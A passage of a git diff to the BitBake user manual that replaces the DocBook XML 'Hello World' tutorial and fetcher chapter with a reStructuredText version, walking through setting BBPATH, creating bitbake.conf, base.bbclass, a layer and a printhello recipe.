-                <literallayout class='monospaced'>
-    SRC_URI = "repo://REPOROOT;protocol=git;branch=some_branch;manifest=my_manifest.xml"
-    SRC_URI = "repo://REPOROOT;protocol=file;branch=some_branch;manifest=my_manifest.xml"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='other-fetchers'>
-            <title>Other Fetchers</title>
-
-            <para>
-                Fetch submodules also exist for the following:
-                <itemizedlist>
-                    <listitem><para>
-                        Bazaar (<filename>bzr://</filename>)
-                        </para></listitem>
-                    <listitem><para>
-                        Mercurial (<filename>hg://</filename>)
-                        </para></listitem>
-                    <listitem><para>
-                        npm (<filename>npm://</filename>)
-                        </para></listitem>
-                    <listitem><para>
-                        OSC (<filename>osc://</filename>)
-                        </para></listitem>
-                    <listitem><para>
-                        Secure FTP (<filename>sftp://</filename>)
-                        </para></listitem>
-                    <listitem><para>
-                        Secure Shell (<filename>ssh://</filename>)
-                        </para></listitem>
-                    <listitem><para>
-                        Trees using Git Annex (<filename>gitannex://</filename>)
-                        </para></listitem>
-                </itemizedlist>
-                No documentation currently exists for these lesser used
-                fetcher submodules.
-                However, you might find the code helpful and readable.
-            </para>
-        </section>
-    </section>
-
-    <section id='auto-revisions'>
-        <title>Auto Revisions</title>
-
-        <para>
-            We need to document <filename>AUTOREV</filename> and
-            <filename>SRCREV_FORMAT</filename> here.
-        </para>
-    </section>
-</chapter>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.rst
new file mode 100644
index 0000000000..e3fd321588
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.rst
@@ -0,0 +1,415 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+===================
+Hello World Example
+===================
+
+BitBake Hello World
+===================
+
+The simplest example commonly used to demonstrate any new programming
+language or tool is the "`Hello
+World <http://en.wikipedia.org/wiki/Hello_world_program>`__" example.
+This appendix demonstrates, in tutorial form, Hello World within the
+context of BitBake. The tutorial describes how to create a new project
+and the applicable metadata files necessary to allow BitBake to build
+it.
+
+Obtaining BitBake
+=================
+
+See the :ref:`bitbake-user-manual/bitbake-user-manual-hello:obtaining bitbake` section for
+information on how to obtain BitBake. Once you have the source code on
+your machine, the BitBake directory appears as follows: ::
+
+   $ ls -al
+   total 100
+   drwxrwxr-x. 9 wmat wmat  4096 Jan 31 13:44 .
+   drwxrwxr-x. 3 wmat wmat  4096 Feb  4 10:45 ..
+   -rw-rw-r--. 1 wmat wmat   365 Nov 26 04:55 AUTHORS
+   drwxrwxr-x. 2 wmat wmat  4096 Nov 26 04:55 bin
+   drwxrwxr-x. 4 wmat wmat  4096 Jan 31 13:44 build
+   -rw-rw-r--. 1 wmat wmat 16501 Nov 26 04:55 ChangeLog
+   drwxrwxr-x. 2 wmat wmat  4096 Nov 26 04:55 classes
+   drwxrwxr-x. 2 wmat wmat  4096 Nov 26 04:55 conf
+   drwxrwxr-x. 3 wmat wmat  4096 Nov 26 04:55 contrib
+   -rw-rw-r--. 1 wmat wmat 17987 Nov 26 04:55 COPYING
+   drwxrwxr-x. 3 wmat wmat  4096 Nov 26 04:55 doc
+   -rw-rw-r--. 1 wmat wmat    69 Nov 26 04:55 .gitignore
+   -rw-rw-r--. 1 wmat wmat   849 Nov 26 04:55 HEADER
+   drwxrwxr-x. 5 wmat wmat  4096 Jan 31 13:44 lib
+   -rw-rw-r--. 1 wmat wmat   195 Nov 26 04:55 MANIFEST.in
+   -rw-rw-r--. 1 wmat wmat  2887 Nov 26 04:55 TODO
+
+At this point, you should have BitBake cloned to a directory that
+matches the previous listing except for dates and user names.
+
+Setting Up the BitBake Environment
+==================================
+
+First, you need to be sure that you can run BitBake. Set your working
+directory to where your local BitBake files are and run the following
+command: ::
+
+  $ ./bin/bitbake --version
+  BitBake Build Tool Core version 1.23.0, bitbake version 1.23.0
+
+The console output tells you what version
+you are running.
+
+The recommended method to run BitBake is from a directory of your
+choice. To be able to run BitBake from any directory, you need to add
+the executable binary to your binary to your shell's environment
+``PATH`` variable. First, look at your current ``PATH`` variable by
+entering the following: ::
+
+  $ echo $PATH
+
+Next, add the directory location
+for the BitBake binary to the ``PATH``. Here is an example that adds the
+``/home/scott-lenovo/bitbake/bin`` directory to the front of the
+``PATH`` variable: ::
+
+  $ export PATH=/home/scott-lenovo/bitbake/bin:$PATH
+
+You should now be able to enter the ``bitbake`` command from the command
+line while working from any directory.
+
+The Hello World Example
+=======================
+
+The overall goal of this exercise is to build a complete "Hello World"
+example utilizing task and layer concepts. Because this is how modern
+projects such as OpenEmbedded and the Yocto Project utilize BitBake, the
+example provides an excellent starting point for understanding BitBake.
+
+To help you understand how to use BitBake to build targets, the example
+starts with nothing but the ``bitbake`` command, which causes BitBake to
+fail and report problems. The example progresses by adding pieces to the
+build to eventually conclude with a working, minimal "Hello World"
+example.
+
+While every attempt is made to explain what is happening during the
+example, the descriptions cannot cover everything. You can find further
+information throughout this manual. Also, you can actively participate
+in the :oe_lists:`/g/bitbake-devel`
+discussion mailing list about the BitBake build tool.
+
+.. note::
+
+   This example was inspired by and drew heavily from
+   `Mailing List post - The BitBake equivalent of "Hello, World!"
+   <http://www.mail-archive.com/yocto@yoctoproject.org/msg09379.html>`_.
+
+As stated earlier, the goal of this example is to eventually compile
+"Hello World". However, it is unknown what BitBake needs and what you
+have to provide in order to achieve that goal. Recall that BitBake
+utilizes three types of metadata files:
+:ref:`bitbake-user-manual/bitbake-user-manual-intro:configuration files`,
+:ref:`bitbake-user-manual/bitbake-user-manual-intro:classes`, and
+:ref:`bitbake-user-manual/bitbake-user-manual-intro:recipes`.
+But where do they go? How does BitBake find
+them? BitBake's error messaging helps you answer these types of
+questions and helps you better understand exactly what is going on.
+
+Following is the complete "Hello World" example.
+
+#.  **Create a Project Directory:** First, set up a directory for the
+    "Hello World" project. Here is how you can do so in your home
+    directory: ::
+
+      $ mkdir ~/hello
+      $ cd ~/hello
+
+    This is the directory that
+    BitBake will use to do all of its work. You can use this directory
+    to keep all the metafiles needed by BitBake. Having a project
+    directory is a good way to isolate your project.
+
+#.  **Run BitBake:** At this point, you have nothing but a project
+    directory. Run the ``bitbake`` command and see what it does: ::
+
+       $ bitbake
+       The BBPATH variable is not set and bitbake did not
+       find a conf/bblayers.conf file in the expected location.
+       Maybe you accidentally invoked bitbake from the wrong directory?
+       DEBUG: Removed the following variables from the environment:
+       GNOME_DESKTOP_SESSION_ID, XDG_CURRENT_DESKTOP,
+       GNOME_KEYRING_CONTROL, DISPLAY, SSH_AGENT_PID, LANG, no_proxy,
+       XDG_SESSION_PATH, XAUTHORITY, SESSION_MANAGER, SHLVL,
+       MANDATORY_PATH, COMPIZ_CONFIG_PROFILE, WINDOWID, EDITOR,
+       GPG_AGENT_INFO, SSH_AUTH_SOCK, GDMSESSION, GNOME_KEYRING_PID,
+       XDG_SEAT_PATH, XDG_CONFIG_DIRS, LESSOPEN, DBUS_SESSION_BUS_ADDRESS,
+       _, XDG_SESSION_COOKIE, DESKTOP_SESSION, LESSCLOSE, DEFAULTS_PATH,
+       UBUNTU_MENUPROXY, OLDPWD, XDG_DATA_DIRS, COLORTERM, LS_COLORS
+
+    The majority of this output is specific to environment variables that
+    are not directly relevant to BitBake. However, the very first
+    message regarding the ``BBPATH`` variable and the
+    ``conf/bblayers.conf`` file is relevant.
+
+    When you run BitBake, it begins looking for metadata files. The
+    :term:`BBPATH` variable is what tells BitBake where
+    to look for those files. ``BBPATH`` is not set and you need to set
+    it. Without ``BBPATH``, BitBake cannot find any configuration files
+    (``.conf``) or recipe files (``.bb``) at all. BitBake also cannot
+    find the ``bitbake.conf`` file.
+
+#.  **Setting BBPATH:** For this example, you can set ``BBPATH`` in
+    the same manner that you set ``PATH`` earlier in the appendix. You
+    should realize, though, that it is much more flexible to set the
+    ``BBPATH`` variable up in a configuration file for each project.
+
+    From your shell, enter the following commands to set and export the
+    ``BBPATH`` variable: ::
+
+      $ BBPATH="projectdirectory"
+      $ export BBPATH
+
+    Use your actual project directory in the command. BitBake uses that
+    directory to find the metadata it needs for your project.
+
+    .. note::
+
+       When specifying your project directory, do not use the tilde
+       ("~") character as BitBake does not expand that character as the
+       shell would.
+
+#.  **Run BitBake:** Now that you have ``BBPATH`` defined, run the
+    ``bitbake`` command again: ::
+
+       $ bitbake
+       ERROR: Traceback (most recent call last):
+         File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 163, in wrapped
+           return func(fn, *args)
+         File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 173, in parse_config_file
+           return bb.parse.handle(fn, data, include)
+         File "/home/scott-lenovo/bitbake/lib/bb/parse/__init__.py", line 99, in handle
+           return h['handle'](fn, data, include)
+         File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/ConfHandler.py", line 120, in handle
+           abs_fn = resolve_file(fn, data)
+         File "/home/scott-lenovo/bitbake/lib/bb/parse/__init__.py", line 117, in resolve_file
+           raise IOError("file %s not found in %s" % (fn, bbpath))
+       IOError: file conf/bitbake.conf not found in /home/scott-lenovo/hello
+
+       ERROR: Unable to parse conf/bitbake.conf: file conf/bitbake.conf not found in /home/scott-lenovo/hello
+
+    This sample output shows that BitBake could not find the
+    ``conf/bitbake.conf`` file in the project directory. This file is
+    the first thing BitBake must find in order to build a target. And,
+    since the project directory for this example is empty, you need to
+    provide a ``conf/bitbake.conf`` file.
+
+#.  **Creating conf/bitbake.conf:** The ``conf/bitbake.conf`` includes
+    a number of configuration variables BitBake uses for metadata and
+    recipe files. For this example, you need to create the file in your
+    project directory and define some key BitBake variables. For more
+    information on the ``bitbake.conf`` file, see
+    http://git.openembedded.org/bitbake/tree/conf/bitbake.conf.
+
+    Use the following commands to create the ``conf`` directory in the
+    project directory: ::
+
+      $ mkdir conf
+
+    From within the ``conf`` directory,
+    use some editor to create the ``bitbake.conf`` so that it contains
+    the following: ::
+
+       PN  = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
+
+       TMPDIR  = "${TOPDIR}/tmp"
+       CACHE   = "${TMPDIR}/cache"
+       STAMP   = "${TMPDIR}/${PN}/stamps"
+       T       = "${TMPDIR}/${PN}/work"
+       B       = "${TMPDIR}/${PN}"
+
+    .. note::
+
+       Without a value for PN , the variables STAMP , T , and B , prevent more
+       than one recipe from working. You can fix this by either setting PN to
+       have a value similar to what OpenEmbedded and BitBake use in the default
+       bitbake.conf file (see previous example). Or, by manually updating each
+       recipe to set PN . You will also need to include PN as part of the STAMP
+       , T , and B variable definitions in the local.conf file.
+
+    The ``TMPDIR`` variable establishes a directory that BitBake uses
+    for build output and intermediate files other than the cached
+    information used by the
+    :ref:`bitbake-user-manual/bitbake-user-manual-execution:setscene`
+    process. Here, the ``TMPDIR`` directory is set to ``hello/tmp``.
+
+    .. tip::
+
+       You can always safely delete the tmp directory in order to rebuild a
+       BitBake target. The build process creates the directory for you when you
+       run BitBake.
+
+    For information about each of the other variables defined in this
+    example, check :term:`PN`, :term:`TOPDIR`, :term:`CACHE`, :term:`STAMP`,
+    :term:`T` or :term:`B` to take you to the definitions in the
+    glossary.
+
+#.  **Run BitBake:** After making sure that the ``conf/bitbake.conf`` file
+    exists, you can run the ``bitbake`` command again: ::
+
+       $ bitbake
+       ERROR: Traceback (most recent call last):
+         File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 163, in wrapped
+           return func(fn, *args)
+         File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 177, in _inherit
+           bb.parse.BBHandler.inherit(bbclass, "configuration INHERITs", 0, data)
+         File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/BBHandler.py", line 92, in inherit
+           include(fn, file, lineno, d, "inherit")
+         File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/ConfHandler.py", line 100, in include
+           raise ParseError("Could not %(error_out)s file %(fn)s" % vars(), oldfn, lineno)
+       ParseError: ParseError in configuration INHERITs: Could not inherit file classes/base.bbclass
+
+       ERROR: Unable to parse base: ParseError in configuration INHERITs: Could not inherit file classes/base.bbclass
+
+    In the sample output,
+    BitBake could not find the ``classes/base.bbclass`` file. You need
+    to create that file next.
+
+#.  **Creating classes/base.bbclass:** BitBake uses class files to
+    provide common code and functionality. The minimally required class
+    for BitBake is the ``classes/base.bbclass`` file. The ``base`` class
+    is implicitly inherited by every recipe. BitBake looks for the class
+    in the ``classes`` directory of the project (i.e ``hello/classes``
+    in this example).
+
+    Create the ``classes`` directory as follows: ::
+
+      $ cd $HOME/hello
+      $ mkdir classes
+
+    Move to the ``classes`` directory and then create the
+    ``base.bbclass`` file by inserting this single line: addtask build
+    The minimal task that BitBake runs is the ``do_build`` task. This is
+    all the example needs in order to build the project. Of course, the
+    ``base.bbclass`` can have much more depending on which build
+    environments BitBake is supporting.
+
+#.  **Run BitBake:** After making sure that the ``classes/base.bbclass``
+    file exists, you can run the ``bitbake`` command again: ::
+
+       $ bitbake
+       Nothing to do. Use 'bitbake world' to build everything, or run 'bitbake --help' for usage information.
+
+    BitBake is finally reporting
+    no errors. However, you can see that it really does not have
+    anything to do. You need to create a recipe that gives BitBake
+    something to do.
+
+#.  **Creating a Layer:** While it is not really necessary for such a
+    small example, it is good practice to create a layer in which to
+    keep your code separate from the general metadata used by BitBake.
+    Thus, this example creates and uses a layer called "mylayer".
+
+    .. note::
+
+       You can find additional information on layers in the
+       ":ref:`bitbake-user-manual/bitbake-user-manual-intro:Layers`" section.
+
+    Minimally, you need a recipe file and a layer configuration file in
+    your layer. The configuration file needs to be in the ``conf``
+    directory inside the layer. Use these commands to set up the layer
+    and the ``conf`` directory: ::
+
+       $ cd $HOME
+       $ mkdir mylayer
+       $ cd mylayer
+       $ mkdir conf
+
+    Move to the ``conf`` directory and create a ``layer.conf`` file that has the
+    following: ::
+
+      BBPATH .= ":${LAYERDIR}"
+      BBFILES += "${LAYERDIR}/\*.bb"
+      BBFILE_COLLECTIONS += "mylayer"
+     `BBFILE_PATTERN_mylayer := "^${LAYERDIR_RE}/"
+
+    For information on these variables, click on :term:`BBFILES`,
+    :term:`LAYERDIR`, :term:`BBFILE_COLLECTIONS` or :term:`BBFILE_PATTERN_mylayer <BBFILE_PATTERN>`
+    to go to the definitions in the glossary.
+
+    You need to create the recipe file next. Inside your layer at the
+    top-level, use an editor and create a recipe file named
+    ``printhello.bb`` that has the following: ::
+
+       DESCRIPTION = "Prints Hello World"
+       PN = 'printhello'
+       PV = '1'
+
+       python do_build() {
+          bb.plain("********************");
+          bb.plain("*                  *");
+          bb.plain("*  Hello, World!   *");
+          bb.plain("*                  *");
+          bb.plain("********************");
+       }
+
+    The recipe file simply provides
+    a description of the recipe, the name, version, and the ``do_build``
+    task, which prints out "Hello World" to the console. For more
+    information on :term:`DESCRIPTION`, :term:`PN` or :term:`PV`
+    follow the links to the glossary.
+
+#. **Run BitBake With a Target:** Now that a BitBake target exists, run
+    the command and provide that target: ::
+
+      $ cd $HOME/hello
+      $ bitbake printhello
+      ERROR: no recipe files to build, check your BBPATH and BBFILES?
+
+      Summary: There was 1 ERROR message shown, returning a non-zero exit code.
+
+    We have created the layer with the recipe and
+    the layer configuration file but it still seems that BitBake cannot
+    find the recipe. BitBake needs a ``conf/bblayers.conf`` that lists
+    the layers for the project. Without this file, BitBake cannot find
+    the recipe.
+
+#. **Creating conf/bblayers.conf:** BitBake uses the
+    ``conf/bblayers.conf`` file to locate layers needed for the project.
+    This file must reside in the ``conf`` directory of the project (i.e.
+    ``hello/conf`` for this example).
+
+    Set your working directory to the ``hello/conf`` directory and then
+    create the ``bblayers.conf`` file so that it contains the following: ::
+
+       BBLAYERS ?= " \
+           /home/<you>/mylayer \
+       "
+
+    You need to provide your own information for ``you`` in the file.
+
+#. **Run BitBake With a Target:** Now that you have supplied the
+    ``bblayers.conf`` file, run the ``bitbake`` command and provide the
+    target: ::
+
+       $ bitbake printhello
+       Parsing recipes: 100% |##################################################################################|
+       Time: 00:00:00
+       Parsing of 1 .bb files complete (0 cached, 1 parsed). 1 targets, 0 skipped, 0 masked, 0 errors.
+       NOTE: Resolving any missing task queue dependencies
+       NOTE: Preparing RunQueue
+       NOTE: Executing RunQueue Tasks
+       ********************
+       *                  *
+       *  Hello, World!   *
+       *                  *
+       ********************
+       NOTE: Tasks Summary: Attempted 1 tasks of which 0 didn't need to be rerun and all succeeded.
+
+    .. note::
+
+       After the first execution, re-running bitbake printhello again will not
+       result in a BitBake run that prints the same console output. The reason
+       for this is that the first time the printhello.bb recipe's do_build task
+       executes successfully, BitBake writes a stamp file for the task. Thus,
+       the next time you attempt to run the task using that same bitbake
+       command, BitBake notices the stamp and therefore determines that the task
+       does not need to be re-run. If you delete the tmp directory or run
+       bitbake -c clean printhello and then re-run the build, the "Hello,
+       World!" message will be printed again.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.xml
deleted file mode 100644
index 11eb36aaf8..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.xml
+++ /dev/null
@@ -1,513 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<appendix id='hello-world-example'>
-    <title>Hello World Example</title>
-
-    <section id='bitbake-hello-world'>
-        <title>BitBake Hello World</title>
-
-        <para>
-            The simplest example commonly used to demonstrate any new
-            programming language or tool is the
-            "<ulink url="http://en.wikipedia.org/wiki/Hello_world_program">Hello World</ulink>"
-            example.
-            This appendix demonstrates, in tutorial form, Hello
-            World within the context of BitBake.
-            The tutorial describes how to create a new project
-            and the applicable metadata files necessary to allow
-            BitBake to build it.
-        </para>
-    </section>
-
-    <section id='example-obtaining-bitbake'>
-        <title>Obtaining BitBake</title>
-
-        <para>
-            See the
-            "<link linkend='obtaining-bitbake'>Obtaining BitBake</link>"
-            section for information on how to obtain BitBake.
-            Once you have the source code on your machine, the BitBake directory
-            appears as follows:
-            <literallayout class='monospaced'>
-     $ ls -al
-     total 100
-     drwxrwxr-x. 9 wmat wmat  4096 Jan 31 13:44 .
-     drwxrwxr-x. 3 wmat wmat  4096 Feb  4 10:45 ..
-     -rw-rw-r--. 1 wmat wmat   365 Nov 26 04:55 AUTHORS
-     drwxrwxr-x. 2 wmat wmat  4096 Nov 26 04:55 bin
-     drwxrwxr-x. 4 wmat wmat  4096 Jan 31 13:44 build
-     -rw-rw-r--. 1 wmat wmat 16501 Nov 26 04:55 ChangeLog
-     drwxrwxr-x. 2 wmat wmat  4096 Nov 26 04:55 classes
-     drwxrwxr-x. 2 wmat wmat  4096 Nov 26 04:55 conf
-     drwxrwxr-x. 3 wmat wmat  4096 Nov 26 04:55 contrib
-     -rw-rw-r--. 1 wmat wmat 17987 Nov 26 04:55 COPYING
-     drwxrwxr-x. 3 wmat wmat  4096 Nov 26 04:55 doc
-     -rw-rw-r--. 1 wmat wmat    69 Nov 26 04:55 .gitignore
-     -rw-rw-r--. 1 wmat wmat   849 Nov 26 04:55 HEADER
-     drwxrwxr-x. 5 wmat wmat  4096 Jan 31 13:44 lib
-     -rw-rw-r--. 1 wmat wmat   195 Nov 26 04:55 MANIFEST.in
-     -rw-rw-r--. 1 wmat wmat  2887 Nov 26 04:55 TODO
-            </literallayout>
-        </para>
-
-        <para>
-            At this point, you should have BitBake cloned to
-            a directory that matches the previous listing except for
-            dates and user names.
-        </para>
-    </section>
-
-    <section id='setting-up-the-bitbake-environment'>
-        <title>Setting Up the BitBake Environment</title>
-
-        <para>
-            First, you need to be sure that you can run BitBake.
-            Set your working directory to where your local BitBake
-            files are and run the following command:
-            <literallayout class='monospaced'>
-     $ ./bin/bitbake --version
-     BitBake Build Tool Core version 1.23.0, bitbake version 1.23.0
-            </literallayout>
-            The console output tells you what version you are running.
-        </para>
-
-        <para>
-            The recommended method to run BitBake is from a directory of your
-            choice.
-            To be able to run BitBake from any directory, you need to add the
-            executable binary to your binary to your shell's environment
-            <filename>PATH</filename> variable.
-            First, look at your current <filename>PATH</filename> variable
-            by entering the following:
-            <literallayout class='monospaced'>
-     $ echo $PATH
-            </literallayout>
-            Next, add the directory location for the BitBake binary to the
-            <filename>PATH</filename>.
-            Here is an example that adds the
-            <filename>/home/scott-lenovo/bitbake/bin</filename> directory
-            to the front of the <filename>PATH</filename> variable:
-            <literallayout class='monospaced'>
-     $ export PATH=/home/scott-lenovo/bitbake/bin:$PATH
-            </literallayout>
-            You should now be able to enter the <filename>bitbake</filename>
-            command from the command line while working from any directory.
-        </para>
-    </section>
-
-    <section id='the-hello-world-example'>
-        <title>The Hello World Example</title>
-
-        <para>
-            The overall goal of this exercise is to build a
-            complete "Hello World" example utilizing task and layer
-            concepts.
-            Because this is how modern projects such as OpenEmbedded and
-            the Yocto Project utilize BitBake, the example
-            provides an excellent starting point for understanding
-            BitBake.
-        </para>
-
-        <para>
-            To help you understand how to use BitBake to build targets,
-            the example starts with nothing but the <filename>bitbake</filename>
-            command, which causes BitBake to fail and report problems.
-            The example progresses by adding pieces to the build to
-            eventually conclude with a working, minimal "Hello World"
-            example.
-        </para>
-
-        <para>
-            While every attempt is made to explain what is happening during
-            the example, the descriptions cannot cover everything.
-            You can find further information throughout this manual.
-            Also, you can actively participate in the
-            <ulink url='http://lists.openembedded.org/mailman/listinfo/bitbake-devel'></ulink>
-            discussion mailing list about the BitBake build tool.
-        </para>
-
-        <note>
-            This example was inspired by and drew heavily from
-            <ulink url="http://www.mail-archive.com/yocto@yoctoproject.org/msg09379.html">Mailing List post - The BitBake equivalent of "Hello, World!"</ulink>.
-        </note>
-
-        <para>
-            As stated earlier, the goal of this example
-            is to eventually compile "Hello World".
-            However, it is unknown what BitBake needs and what you have
-            to provide in order to achieve that goal.
-            Recall that BitBake utilizes three types of metadata files:
-            <link linkend='configuration-files'>Configuration Files</link>,
-            <link linkend='classes'>Classes</link>, and
-            <link linkend='recipes'>Recipes</link>.
-            But where do they go?
-            How does BitBake find them?
-            BitBake's error messaging helps you answer these types of questions
-            and helps you better understand exactly what is going on.
-        </para>
-
-        <para>
-            Following is the complete "Hello World" example.
-        </para>
-
-        <orderedlist>
-            <listitem><para><emphasis>Create a Project Directory:</emphasis>
-                First, set up a directory for the "Hello World" project.
-                Here is how you can do so in your home directory:
-                <literallayout class='monospaced'>
-     $ mkdir ~/hello
-     $ cd ~/hello
-                </literallayout>
-                This is the directory that BitBake will use to do all of
-                its work.
-                You can use this directory to keep all the metafiles needed
-                by BitBake.
-                Having a project directory is a good way to isolate your
-                project.
-                </para></listitem>
-            <listitem><para><emphasis>Run BitBake:</emphasis>
-                At this point, you have nothing but a project directory.
-                Run the <filename>bitbake</filename> command and see what
-                it does:
-                <literallayout class='monospaced'>
-     $ bitbake
-     The BBPATH variable is not set and bitbake did not
-     find a conf/bblayers.conf file in the expected location.
-     Maybe you accidentally invoked bitbake from the wrong directory?
-     DEBUG: Removed the following variables from the environment:
-     GNOME_DESKTOP_SESSION_ID, XDG_CURRENT_DESKTOP,
-     GNOME_KEYRING_CONTROL, DISPLAY, SSH_AGENT_PID, LANG, no_proxy,
-     XDG_SESSION_PATH, XAUTHORITY, SESSION_MANAGER, SHLVL,
-     MANDATORY_PATH, COMPIZ_CONFIG_PROFILE, WINDOWID, EDITOR,
-     GPG_AGENT_INFO, SSH_AUTH_SOCK, GDMSESSION, GNOME_KEYRING_PID,
-     XDG_SEAT_PATH, XDG_CONFIG_DIRS, LESSOPEN, DBUS_SESSION_BUS_ADDRESS,
-     _, XDG_SESSION_COOKIE, DESKTOP_SESSION, LESSCLOSE, DEFAULTS_PATH,
-     UBUNTU_MENUPROXY, OLDPWD, XDG_DATA_DIRS, COLORTERM, LS_COLORS
-                </literallayout>
-                The majority of this output is specific to environment variables
-                that are not directly relevant to BitBake.
-                However, the very first message regarding the
-                <filename>BBPATH</filename> variable and the
-                <filename>conf/bblayers.conf</filename> file
-                is relevant.</para>
-                <para>
-                When you run BitBake, it begins looking for metadata files.
-                The
-                <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
-                variable is what tells BitBake where to look for those files.
-                <filename>BBPATH</filename> is not set and you need to set it.
-                Without <filename>BBPATH</filename>, BitBake cannot
-                find any configuration files (<filename>.conf</filename>)
-                or recipe files (<filename>.bb</filename>) at all.
-                BitBake also cannot find the <filename>bitbake.conf</filename>
-                file.
-                </para></listitem>
-            <listitem><para><emphasis>Setting <filename>BBPATH</filename>:</emphasis>
-                For this example, you can set <filename>BBPATH</filename>
-                in the same manner that you set <filename>PATH</filename>
-                earlier in the appendix.
-                You should realize, though, that it is much more flexible to set the
-                <filename>BBPATH</filename> variable up in a configuration
-                file for each project.</para>
-                <para>From your shell, enter the following commands to set and
-                export the <filename>BBPATH</filename> variable:
-                <literallayout class='monospaced'>
-     $ BBPATH="<replaceable>projectdirectory</replaceable>"
-     $ export BBPATH
-                </literallayout>
-                Use your actual project directory in the command.
-                BitBake uses that directory to find the metadata it needs for
-                your project.
-                <note>
-                    When specifying your project directory, do not use the
-                    tilde ("~") character as BitBake does not expand that character
-                    as the shell would.
-                </note>
-                </para></listitem>
-            <listitem><para><emphasis>Run BitBake:</emphasis>
-                Now that you have <filename>BBPATH</filename> defined, run
-                the <filename>bitbake</filename> command again:
-                <literallayout class='monospaced'>
-     $ bitbake
-     ERROR: Traceback (most recent call last):
-       File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 163, in wrapped
-         return func(fn, *args)
-       File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 173, in parse_config_file
-         return bb.parse.handle(fn, data, include)
-       File "/home/scott-lenovo/bitbake/lib/bb/parse/__init__.py", line 99, in handle
-         return h['handle'](fn, data, include)
-       File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/ConfHandler.py", line 120, in handle
-         abs_fn = resolve_file(fn, data)
-       File "/home/scott-lenovo/bitbake/lib/bb/parse/__init__.py", line 117, in resolve_file
-         raise IOError("file %s not found in %s" % (fn, bbpath))
-     IOError: file conf/bitbake.conf not found in /home/scott-lenovo/hello
-
-     ERROR: Unable to parse conf/bitbake.conf: file conf/bitbake.conf not found in /home/scott-lenovo/hello
-                </literallayout>
-                This sample output shows that BitBake could not find the
-                <filename>conf/bitbake.conf</filename> file in the project
-                directory.
-                This file is the first thing BitBake must find in order
-                to build a target.
-                And, since the project directory for this example is
-                empty, you need to provide a <filename>conf/bitbake.conf</filename>
-                file.
-                </para></listitem>
-            <listitem><para><emphasis>Creating <filename>conf/bitbake.conf</filename>:</emphasis>
-                The <filename>conf/bitbake.conf</filename> includes a number of
-                configuration variables BitBake uses for metadata and recipe
-                files.
-                For this example, you need to create the file in your project directory
-                and define some key BitBake variables.
-                For more information on the <filename>bitbake.conf</filename> file,
-                see
-                <ulink url='http://git.openembedded.org/bitbake/tree/conf/bitbake.conf'></ulink>.
-                </para>
-                <para>Use the following commands to create the <filename>conf</filename>
-                directory in the project directory:
-                <literallayout class='monospaced'>
-     $ mkdir conf
-                </literallayout>
-                From within the <filename>conf</filename> directory, use
-                some editor to create the <filename>bitbake.conf</filename>
-                so that it contains the following:
-                <literallayout class='monospaced'>
-     <link linkend='var-bb-PN'>PN</link>  = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
-                </literallayout>
-                <literallayout class='monospaced'>
-     TMPDIR  = "${<link linkend='var-bb-TOPDIR'>TOPDIR</link>}/tmp"
-     <link linkend='var-bb-CACHE'>CACHE</link>   = "${TMPDIR}/cache"
-     <link linkend='var-bb-STAMP'>STAMP</link>   = "${TMPDIR}/${PN}/stamps"
-     <link linkend='var-bb-T'>T</link>       = "${TMPDIR}/${PN}/work"
-     <link linkend='var-bb-B'>B</link>       = "${TMPDIR}/${PN}"
-                </literallayout>
-                <note>
-                    Without a value for <filename>PN</filename>, the
-                    variables <filename>STAMP</filename>,
-                    <filename>T</filename>, and <filename>B</filename>,
-                    prevent more than one recipe from working. You can fix
-                    this by either setting <filename>PN</filename> to have
-                    a value similar to what OpenEmbedded and BitBake use
-                    in the default <filename>bitbake.conf</filename> file
-                    (see previous example). Or, by manually updating each
-                    recipe to set <filename>PN</filename>. You will also
-                    need to include <filename>PN</filename> as part of the
-                    <filename>STAMP</filename>, <filename>T</filename>, and
-                    <filename>B</filename> variable definitions in the
-                    <filename>local.conf</filename> file.
-                </note>
-                The <filename>TMPDIR</filename> variable establishes a directory
-                that BitBake uses for build output and intermediate files other
-                than the cached information used by the
-                <link linkend='setscene'>Setscene</link> process.
-                Here, the <filename>TMPDIR</filename> directory is set to
-                <filename>hello/tmp</filename>.
-                <note><title>Tip</title>
-                    You can always safely delete the <filename>tmp</filename>
-                    directory in order to rebuild a BitBake target.
-                    The build process creates the directory for you
-                    when you run BitBake.
-                </note></para>
-                <para>For information about each of the other variables defined in this
-                example, click on the links to take you to the definitions in
-                the glossary.
-                </para></listitem>
-            <listitem><para><emphasis>Run BitBake:</emphasis>
-                After making sure that the <filename>conf/bitbake.conf</filename>
-                file exists, you can run the <filename>bitbake</filename>
-                command again:
-                <literallayout class='monospaced'>
-     $ bitbake
-     ERROR: Traceback (most recent call last):
-       File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 163, in wrapped
-         return func(fn, *args)
-       File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 177, in _inherit
-         bb.parse.BBHandler.inherit(bbclass, "configuration INHERITs", 0, data)
-       File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/BBHandler.py", line 92, in inherit
-         include(fn, file, lineno, d, "inherit")
